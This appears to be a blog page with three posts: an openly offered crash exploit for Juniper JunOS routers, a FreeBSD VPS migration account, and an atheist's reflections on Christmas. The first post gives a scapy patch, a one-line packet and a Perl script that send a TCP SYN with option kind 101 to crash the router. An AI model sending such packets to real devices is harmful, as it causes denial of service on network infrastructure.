evilrouters.net

Photo from gr33ndata.

I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0×65 (decimal 101). A diff is below (basically, just need to add two lines).

For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.

$ diff inet.py inet.py.bak
203,204c203
<                 15 : ("AltChkSumOpt",None),
<                 101 : ("JunOS",None)
---
>                 15 : ("AltChkSumOpt",None)
215d213
<                 "JunOS":101
$

Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!

$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>

The box, of course, crashed and rebooted immediately.

This code works for me, over and over again. Let me know if it works for you. Sorry about the shitty quality of the video, all I had handy was my Blackberry.

UPDATE: I’ve posted a much better video of the crash in action.

$ cat junos-crash.pl 
#!/usr/bin/perl

my $host =      shift;
my $port =      shift;

use             Net::Packet qw($Env);

use             Net::Packet::IPv4;
my $ip =        Net::Packet::IPv4->new(dst => $host);

use             Net::Packet::TCP;

my $tcp =       Net::Packet::TCP->new(
                    dst         => $port,
                    options     =>  "\x65\x02\x01\x01", 
                );

use             Net::Packet::Frame;
my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;

Now can I see your advisory, Juniper?

UPDATE: Nevermind, Juniper, I found it.

Recently, I moved the web site over from shared hosting at 1and1 to a VPS running FreeBSD 8.0 from ARP Networks (@arpnetworks and @bsdvps). They have a special going on right now, for a VPS with 768 MB of memory, 20 GB of disk space, and 200 GB of bandwidth for $20/mo. (that’s cheaper than Slicehost and Linode, who I also looked into), and they support FreeBSD!

I signed up online and within about half an hour, my VPS had been provisioned and I had the details needed to log in. Fortunately for me, it was late at night when I signed up, which is when they generally take care of this stuff (or so I’ve gathered, from hanging around their IRC channel). In a few hours time, I had set up my user accounts, updated the sources, rebuilt the world and a new kernel, configured the firewall and pretty had the “base” of the server the way I wanted it. I slept.

The next day, in short order, I had Apache, PHP5, and MySQL installed and up and running. To move this blog over, I dumped the MySQL database that Wordpress uses, made a backup of the Wordpress files, scp’d them over to the VPS, recreated the database and extracted the backup. After a quick edit of wp-config.php and editing the hosts file on my Windows 7 desktop, I was able to load up the website running off of the VPS. I tested as much as I could and, when I was satisfied everything was working correctly, I changed the A records in DNS, and waited for the change to take effect.

I began tailing Apache’s access.log files and watched, in pretty much real-time, as visitors were slowly directed over the “new” website running on the VPS.

Since that time, eight days or so ago, I haven’t heard of or noticed any issues with the site, so I assume everything is going well. I’ve also done a number of other things with the server, such as configuring log rotation (and per-vhost transfer and error logs, in Apache), replaced sendmail with Postfix and enabled relaying from my home mail server (my e-mail is still hosted on Google Apps and will be, for the foreseeable future), purchased an SSL certificate and enabled SSL on the website (mostly for the administration interface, but feel free to use SSL if you’d like), and enabled a nightly rsync to an off-site host where backups are then made.

The reason for the latter is to reduce the amount of traffic on the VPS. The Wordpress files don’t change very often at all (usually only if I update Wordpress, add or modify plugins or themes, etc.) and the database doesn’t either, so I chose to simply rsync them to an off-site machine. The traffic used for this is around 650 kB currently. I then run a backup on the off-site machine, and the backups are around 55 MB. Doing it this way accomplishes the goal of having a nightly backup (I’m keeping 30 days worth) in a different physical location (indeed, halfway across the United States) as well as minimizing the amount of traffic on the VPS.

So far, I haven’t had a single issue with the VPS, thanks to my superior sysadmin skillz (hah!) and the great job of the guys at ARP Networks. Their servers have RAID 10, redundant power supplies (on separate circuits and UPS), they run their own multi-homed network, support native IPv6 (this may be my next blog-related project), and their equipment is located in the Wilshire Annex facility at 900 N. Alameda, in Los Angeles. If you’re looking for a VPS provider, check ‘em out (and, before you ask, my only relationship with them is as a paying customer).

Reliable hardware and network, and a rock-solid and stable operating system, this is the right way to run your website!

As someone who doesn’t really care for Christmas, this is a weird time of year.

The “reason for the season” is supposed to be to celebrate the birth of Jesus Christ. Neither theologists nor the New Testament pinpoint the actual date of birth of Jesus, however (assuming he ever existed — something I am not convinced of). What few people realize, of course, is that the origins of Christmas are pagan and were celebrated in Europe long before anyone had ever heard of a man named Jesus Christ. In 350 AD, Pope Julius I made a declaration that Christ’s birth would be celebrated on December 25th. Theologists and historians seem to agree that he was simply trying to make it as easy as possible for pagan Romans (the majority) to convert over to Christianity. The early Roman Church simply took control of all the shrines and festivals. Places where pagan goddesses had previously gave oracles becomes shrines of the blessed virgin Mary. For the most part, the people didn’t really mind — they still had bonfires, feasts, gift-giving and, of course, excuses to get drunk. The switch from pagan to Christmas simply meant business as usual.

I consider myself an atheist. Since I don’t believe in God or Jesus, the whole reason that we celebrate this holiday (if you ask the majority of US citizens), you might wonder what I do for Christmas. The “magic” of Christmas is diluted more and more every year by commercialization. For so many of us, the holiday is nothing more than an excuse for presents and the stuffing of faces. In modern society, the idea of Christmas as a day to worship and be thankful for the Son of God is mostly dead. I am, therefore, not alone. My views on religion are summed up quite nicely by a friend’s “Religious views” on Facebook: “lights out — game over” (thanks, Jason).

I choose not to participate in most of the “traditions”. It’s been many years since I have stepped into a church. The last time was several years ago at Easter, when I felt obligated by family to attend. I have not erected a Christmas tree for a number of years. I have stopped purchasing gifts that will go unappreciated and, quite likely, returned for something else.

Does all this mean that I do not participate at all in the holidays? Absolutely not. I have just changed how I do it. While I’m not rich by any means, I get by comfortably and am still able to buy and do many of the things that I want. In previous years, I would spend tons of money on gifts for family members and girlfriends that, as I mentioned, often went underappreciated or would end up being returned. Last year, in particular, I decided to do things a little different.

A couple of days before Christmas, I went to the bank and withdrew a decent amount of money, all in five-dollar bills. I then drove to a mall about an hour and a half away (where I was less likely to run into people who knew me) and randomly handed out $5 bills to people I passed by (mostly to kids, but some adults as well). I can’t recall of one instance where I didn’t get, at the least, a smile in return. When folks started catching on and approaching me, I simply left and drove to another mall, and continued until I was out of money. That whole experience brought me much greater pleasure than buying meaningless items for family and friends ever has.

This year, I haven’t bought a single gift, nor do I plan to (likewise, I neither want nor will accept any). Last night, however, I did make a list of names and address of non-profit organizations in my area. I went through the list, picked out those I feel most deserve it, and wrote down a number next to their names. This morning, I’ll make a trip to my bank, then to the post office to pick up a number of money orders that I’ll then deliver to those non-profits (anonymously, of course). I’m sure they’ll appreciate it, put it to good use, and won’t try to return it for something else.

Unlike some, I do not get upset when someone wishes me a “Merry Christmas”. I suspect that if you wish your Muslim, Hindu, or Buddhist neighbors a Merry Christmas, they will grin right back and return the season’s greetings. Quoting Markham Hislop, “As an atheist, I like that. Even though I don’t share the Christian faith, I can respect the values of this most Christian of holidays — love, charity, compassion to those less fortunate, and a profound appreciation for the wonder of life. We need holidays like Christmas to remind us of the many good things humandkind is capable of.”

Martin Willett wrote: “We don’t need a non-existant God to send a son to be killed as a blood sacrifice for us. We just need to understand our shared humanity. That is the true message of this season of hope. We could do it at any time, but December 25th is traditional. The festival is called Christmas, it contains the name of a mythic religious entity that I do not regard as a god, but then so do the words Tuesday, Wednesday, Thursday and Friday. No big deal. As an atheist I have no more problems with Christmas than I do with Wednesdays.”

Lastly, to my family, you may or may not see me at dinner on Friday — I’m still undecided. I may end up making the trip down, we’ll see.

Merry Christmas, folks.